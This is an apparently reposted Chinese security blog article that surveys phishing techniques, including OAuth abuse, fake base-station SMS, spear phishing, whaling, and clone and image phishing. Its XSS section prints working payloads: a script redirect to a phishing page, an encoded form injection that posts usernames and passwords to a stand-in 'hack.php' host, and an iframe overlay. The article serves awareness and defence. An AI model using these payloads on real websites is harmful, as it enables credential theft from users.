一、前言
1.1 “邮件门”
美国大选已经告一段落,特朗普干翻希拉里成功入主白宫。希拉里的落败原因有很多,但有一点我们还是不得不提,那就是沸沸扬扬的“邮件门”事件。
“邮件门”这件事比较复杂,辣条君只能简单地讲一讲。大抵就是希拉里竞选团队的负责人波斯得塔的邮件被黑,导致很多邮件泄漏,其中包括了各种丑闻记录,这些记录让希拉里形象一落千丈。间接地导致了竞选的失利。
那么问题来了,原本处于绝密状态的邮件为啥会被公之于众?
没错,钓鱼邮件。这也多亏希拉里的一班猪队友,波斯得塔在错误的时间点开了错误的邮件。这封邮件大意就是说有人试图在乌克兰登录波斯得塔的Gmail账户,但没有成功,提示波斯得塔马上修改密码。在团队职员确认邮件后,波斯得塔点开了邮件,然后输入了密码,黑客通过此密码从他的邮箱下载了数万的电邮,将其交给维基解密,于是就出现了“邮件门”丑闻。
小小的钓鱼邮件就能对美国大选产生如此大的影响,足见,网络钓鱼的危害有多大。而随着互联网技术的高速发展、电子商务平台的大规模应用和推广、黑客攻击驱动力的变化,网络钓鱼出现了新的转变。作为一种主要基于互联网传播和实施的攻击,“钓鱼攻击”(Phishing Attack)正呈逐年上升之势,并且手段也在逐渐丰富、变化,网络钓鱼变得越来越难以对付。
1.2 网络钓鱼?这是什么东西?
网络钓鱼,从字面上理解就是通过网络来实行钓鱼的一种行为,这种做法类似姜太公钓鱼,愿者上钩。对于网络钓鱼,国际反钓鱼网站工作组APWG(Anti-Phishing Working Group)给出的定义如下:
一种利用社会工程和技术欺骗,针对个人身份数据和金融帐号进行盗窃的犯罪机制。
1.3 什么是社会工程攻击?
提到社会工程不得不提一个人。相信对网络有较深入的玩家都知道凯文·米特尼克。他是黑客中的王者。在他身上体现了什么是真正的社会工程。他缔造了一个又一个神话。15岁侵入“北美空中防务指挥系统”的计算主机内。紧接着又侵入了“太平洋电话”公司,更改了数据库中的数据。这只是凯文·米特尼克辉煌历史中的一个小片段。他获得的成就仰仗的不仅是传统的系统入侵,更主要的是社会工程学。社会工程就是利用人的心理弱点(如人的本能反应、好奇心、信任、贪婪)、规章与制度的漏洞等进行诸如欺骗、伤害等手段,以期获得所需的信息(如计算机口令、银行帐号信息)。这类攻击在网络罪犯群体中备受青睐。
二、手起刀落,钓鱼手法、种类节选
在过去,网络钓鱼仅仅只是简单的攻击,比如攻击者发送一条带有跳转信息的链接,然后引诱用户在自己的电脑上运行恶意代码。但现在,网络钓鱼已经大大的超出了以前的范畴,尽管概念没有变,但手法却变得异常复杂,有的钓鱼甚至是好几种技术结合在一起的,有的则颠覆了我们对钓鱼的传统看法。接下来,FB小编就带你绕地球一周,看看oAuth钓鱼、基于伪基站的短信钓鱼、邮件钓鱼、XSS钓鱼等一系列的钓鱼手法。由于钓鱼手法实在是名目繁多,小编就只选其中的一部分来做描述,也希望各位轻喷。
2.1 颠覆传统思维的钓鱼——利用oAuth 钓鱼
这种钓鱼方式在FB先前的文章中有介绍,这里就不做具体阐述,大家可以参考《案例分析:利用oAtuh钓鱼》一文。在我们印象中,网络钓鱼的过程通常是黑客引诱用户输入账号密码,然后盗取你的数据。但利用oAuth钓鱼则颠覆了这一传统思维,并不需要你输入你的密码,而是通过对应用的授权,获取accessToken以API请求的方式获取所有的资源。更可怕的是,传统的防御手法对这个钓鱼一点用处也没有,什么双因子认证,Smart Screen,什么安全意识,在oAuth面前都是那么苍白无力,因为人家根本不用这些东西。
oAuth攻击大概分为以下几个部分:
1、创建一个应用Sappo
2、利用该应用创建一个申请授权的链接(SCOPE)
3、用户给应用Sappo授权后,获取AuthCode
4、利用AuthCode获取accessToken
5、使用accessToken以API请求的方式获取所有资源
这种手法是授权在Windows下进行的,浏览器也认定该请求是合法的请求,最重要的一点是整个过程没有让你输入账号密码(就算是输入了账号,也是用于登录合法网站的,与钓鱼网站并无关系),所以,我们根本不能辨别出这是一个钓鱼事件,就算是专业人士,也不一定能识别出来。
怎么办?从我们用户的角度来看,给应用授权的时候一定要十分小心,并且对给予应用授权的权限要仔细斟酌,特别是某些包含敏感数据的应用更加要慎重。还可以采取其他的手段来对应用进行限制,比如当用户从门户进来时,才可以进行解密然后浏览数据,而当API到来的时候,看到的数据都是加密的。
2.2 伪基站策略之短信钓鱼(Smshing)
不知道大家对伪基站熟悉不熟悉?现在的多数短信钓鱼都是建立在伪基站短信钓鱼的基础上进行的。伪基站顾名思义就是假基站,设备一般由主机和笔记本电脑组成,通过短信群发器、短信发信机等相关设备,利用2G网络单向鉴权的漏洞,搜寻到一定半径范围内的手机卡信息,“劫持”用户的手机信号,模拟成任意手机号码向用户发送短信。
伪基站整体思路
举个栗子,某君某一天受到了伪基站钓鱼的攻击。话说某君在上班途中,收到了来自95555的通知短信,该短信是银行短信中心的积分兑换提醒。
图中的前两条短信是正常业务的,最后一条是才收到的。略微一看,没有什么不对。但仔细观察的话,你就会发现如下疑点:
1.地址略微不同,正常的应该是类似cmbt.com这种;
2.标点符号全半角混用,这个不注意还真看不出来。
当然,最容易让我们迷惑的是发送方来自95555,而且你拨号的时候,有些手机还会出现招商银行的图标:
如果你对信息详情进行检验之后,你会发现猫腻藏在这里。
将两个短信对比,会发现发送时间和服务中心均不同,假短信发送时间已经好几年了,查了一下相关的资料发现:短消息点对点协议(CMPP,SMPP)中,对短信生命周期的约定是最长48小时。另外,手机接收到的短信息,都会显示发送者的短信中心(SMSC)。由此断定,这个短信是来自伪基站,而不是正常的移动网络。
如果你打开短信中的链接,攻击者就会引导你做一系列操作,最终目的是让你下载一个app。在app安装后,会将桌面图标隐藏起来,还会获取一系列高危权限,如开机自启动,收发短信等,最为严重的是,控制者尝试偷取受害手机里的X.509证书文件(该证书包含了手机的所有敏感信息,如版本号、序列号、签发人姓名等)。最后,手机沦为控制者的肉鸡,控制者就可以通过手机为非作歹了,而机主并不知道发生了什么。
伪基站确实杀伤力十足,而我们日常又疏于防范,对我们造成了很大威胁。当然,还有其他的短信钓鱼方式,这里就不一一枚举了。
2.3 鱼叉式网络钓鱼(Spear phishing)
在网络安全领域工作的人都知道,网络钓鱼攻击,特别是针对大型企业的网络钓鱼攻击正在崛起。这一类攻击基本上都是采用鱼叉式网络钓鱼(Spear Phishing),该类攻击可以入侵所有的防御层,成功率非常高,可以针对不同的平台。无论是Linux、Mac OS、还是windows都是其狩猎的目标。最近几年发生的数据泄漏事件也大多始于鱼叉式网络钓鱼攻击,并且90%的APT攻击也是通过网络钓鱼来完成的。
鱼叉式网络钓鱼源于亚洲与东欧,这种手法主要是针对特定人群目标的钓鱼攻击,比如企业高层,特定的政府部门以及其他敏感的企业(各位如有兴趣,可以在此查看网络钓鱼的时间轴)。
在鱼叉式钓鱼攻击的案列中,最著名的当属RSA安全公司被黑事件。RSA是一家全球顶级的安全公司,致力开发双因素用户认证、加密和公钥管理系统。2011年,攻击者向RSA公司的母公司EMC的4位员工发送了两封不同的鱼叉式钓鱼邮件,该邮件有一个包含了0day漏洞的恶意附件——2011 Recruitment Plan。这个附件的妙处就是,只要4人中的任意一人点击该附件,这个漏洞利用就会对Adobe Flash中的漏洞发起攻击,并在受害者的电脑中预留后门。(RSA传送门1,2)
通过该后门,攻击者可以对该公司网络系统进行有价值的侦测和映射。最终,通过不懈努力,攻击者成功窃取了该公司SecurID双因素认证产品的信息。
其实,此类案列的教育意义更大于实际意义。像这种做安全行业巨头,按理说,公司的每个员工都应该是训练有素、安全意识非常高的,他们应该知道如何应对可疑邮件。然而,这名员工还是执意要查看邮件内容,他竟从垃圾箱将其恢复并打开了它,更讽刺的是,邮件过滤器已经将其标为可疑文件,由此可见,安全不见得“安全”,总有好奇宝宝禁不住诱惑,企业安全意识教育刻不容缓。(由于RSA拒绝提供病毒副本,市面上并没有脚本流出,想做案例分析也没辙)
2.4 艺术的欺诈者——鲸钓(Whaling Phishing)
鲸钓跟前面的鱼叉式网络钓鱼有相似之处(关于spear phishing和whaling phishing的区别,大家可以阅读这一篇文章),都是针对特定的人群来进行社会工程攻击,不过这两者还是有一些差别。鲸钓虽然说也是targeted attack,但目标主要还是集中在带C字头的企业高管,政界人士和名人(这些人就是所谓的“鲸”),从受众面来看,鲸钓似乎影响会更大(其实我们可以从字面来看,一个是钓鱼,一个是鲸,哪个造成的危害更大,一眼就看出来了),但实际上攻击者更愿意选择鱼叉式网络钓鱼(或许是成功率更高)。
据国外相关机构的统计,大约35%的CEO和CFO受到过鲸钓攻击。如此严重的情况必然逃不过FBI 的法眼。据FBI的统计显示,自2015年1月以来,鲸钓的受害者已经增加了270%,而从这些骗局在过去3年已经让这些公司损失了至少23亿美元,受影响的国家超过80个。比如美泰公司在2015年就因为一个CEO骗局而损失了300万美元。
2.5 XSS钓鱼
XSS(跨站脚本)钓鱼,我与跨站脚本攻击结缘是在《白帽子讲Web安全》那本书中,在白帽子中,第一个讲的攻击类型就是XSS,所以印象较为深刻。XSS本名为CSS,但为了避嫌,忍气吞声的被人叫做XSS。XSS攻击通常是指黑客通过“HTML注入”篡改了网页,插入了恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击,因为一开始的案例演示是跨域的,所以叫做“跨站脚本”。XSS破坏力巨大,产生的场景也复杂。
而现在,XSS更是被广泛的用于网络钓鱼,对我们造成了很大的威胁。XSS钓鱼主要有重定向钓鱼、HTML注入式攻击、XSS框架钓鱼以及flash钓鱼等。
2.5.1 重定向钓鱼
URL重定向是指当使用者浏览某个网址时,将他导向另一个网址的技术。这种类型的钓鱼一般是将较长的网站网址转换成较短网址。因为当要传播某网站的网址时,常常因为网址太长,不好记忆;又有可能因为换了网路的免费网页空间,网址又必须要变更,不知情的使用者还以为网站关闭了。这时就可以用网路上的转址服务了。这个技术使一个网页是可借由不同的统一资源定位符(URL)连结。如正常的用户URL为http://localhost/cookie1.php?user=UserName&pass=PassWord&name=login,由于我们的程序并没有对提交的数据进行处理,而直接输出,那么用户就可以通过提交特定的数据实现重定向。
当用户访问的时候,页面就被重定向至钓鱼页面。
http://localhost/cookie1.php?user=<script>document.location.href="http://127.0.0.1/phishing.html"</script>&pass=PassWord&name=login
2.5.2 HTML注入式攻击
利用XSS向页面中插入HTML/Javascript代码,由于没有进行过滤,代码将直接被浏览器解析。
http://localhost/cookie1.php?user=%3Cscript%3Evar%20biaodan=document.getElementById%28%27login%27%29;biaodan.style=%22display:none%22%3C/script%3E%3Chtml%3E%3Cform%20action=%22192.168.0.1/hack.php%22%20method=%22get%22%3E%3Cinput%20type=%22text%22%20name=%22user%22%20value=%22UserName%22%3E%3Cinput%20type=%22text%22%20name=%22pass%22%20value=%22PassWord%22%3E%3Cinput%20type=%22submit%22%20name=%22name%22%20value=%22login%22%3E%3C/form%3E%3C/html%3E&pass=&name=login
浏览器解析后,隐藏了原来的登录表单,生成了一个新的表单并将数据提交到指定的地址。
2.5.3 XSS框架钓鱼
此类钓鱼是通过<iframe>标签嵌入一个远程域,以覆盖原有的页面(POC在这)。
<div style="position:absolute;top:0px;left:0px;width:100%;height:100%"><iframesrc=http://127.0.0.1/phishing.html width=100% height=100%></iframe></div>
在写出代码片段后,在我们访问登录页面时,会发现正常页面一闪而过,然后就跳转至我们所设定的钓鱼页面。
通过源代码不难看出,整个页面已经被一个frame框架覆盖,并且数据提交地址已经改变。现在,只要你输入帐号之类的信息,这些数据就会提交至我们的服务器,我们服务器会将其保存下来,url也会跳转至我们指定的地址。
XSS钓鱼带来的危害非常大,在XSS攻击之后,攻击者除了可以试试”Cookie劫持”外,还能通过模拟GET、POST请求操作用户的浏览器。我们可以通过加验证码或者在修改密码的时候要求用户输入旧的密码等简单方式来预防XSS钓鱼攻击。但这并不是万能的,只能在一定程度上减少被攻击的概率。
2.6 克隆钓鱼(Clone phishing)
克隆钓鱼,顾名思义,就是将某个网站克隆下来,将其中的某环节篡改,然后将受害者引导至钓鱼页面;或者是制作一个UI界面一样的可执行程序,以此来让用户上当。克隆钓鱼基本上会采取web、exe、URL等方式。
与其他类型的钓鱼一样,克隆钓鱼也可能会要求你输入账户信息等,就像你在登录正规网站的时候做的那样。
与其他手法的网络钓鱼相比,克隆钓鱼应该是对技术要求比较低的。在应对简单克隆时,我们甚至不需要借助专业的工具,因为浏览器本身就支持源码查看功能,只要将这些源码保存下来(可以借助迅雷等下载软件)就可以对网站进行克隆。当然,你如果要进行复杂的克隆活动,就需要借助专业的工具来进行了。
克隆钓鱼造成的危害也不容小觑,由于网站或者邮件做的很逼真,一般的受害者都没有办法分辨真假,因此很容易上当。遇到自己不熟悉的网站或者邮件,留一个心眼,千万确认没有问题以后才点进去。
2.7 点击图片背后的风险——图片钓鱼(Picture Phishing)
在我们浏览某个信任的网站的时候,如果评论区的某张图片看不清楚,你是不是有一种冲动打开它呢?如果你打开该图片,大概会有2种情况发生:
新窗口打开: 源网站被改变成钓鱼网站。
源窗口打开: 你打开该图片,看完后点击浏览器上的返回按钮,继续返回浏览评论。
其实,这个过程就是黑客下手的地方。黑客完全可以让用户点击浏览器“返回”按钮锁返回的地址不再是原来的那个网址,而是黑客精心构造的钓鱼网址。
黑客是如何做到的?其实,也不是多大的难事。黑客往往会对图片的大小做修改,让它看起来比较模糊,由于人的猎奇心理,很多人都会忍不住点击并打开查看。因为现在网站基本上都支持图片的缩放,殊不知,黑客正是利用了这一点来制造图片钓鱼攻击的。例如:
在评论区里看到的图片应该是下面这个样子的。
当你手贱,忍不住打开图片的时候,就会是这样子的。
当你打开后,确实能看到原来那张图片的放大版。但与此同时,原来那个网页却正在悄悄的改变……
这里为了更加直观,我们使用Google来演示。在实际运用中,也许我们可以转到一个与原来网站一模一样的页面,提示用户登陆,我们甚至可以完全模拟该网站,仅仅把网站的内的下载链接篡改成自己的病毒软件。(如需要查看完整案例,请点这里)
在现在这个几乎上人手一部电脑,人手一部智能手机的时代,图片钓鱼出现的几率相比之前也大大增加,而且引诱手段也不止文中提到的这一种。我们往往会忽视一个细节,越简单的钓鱼手法,上当的人就会越多,因为大家都疏于防范。
要避免这类攻击,小编教你一个小技巧。就是小心再三,关注一下你点开的链接。使用右键,选择在新标签中打开链接来打开新的链接。这里我想起了某61°的广告词,多一度关怀,多一度热爱,乃们是不是感受到了latiaojun深深的爱呢,同意的点个赞,评个论啥的~~~
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/55239.html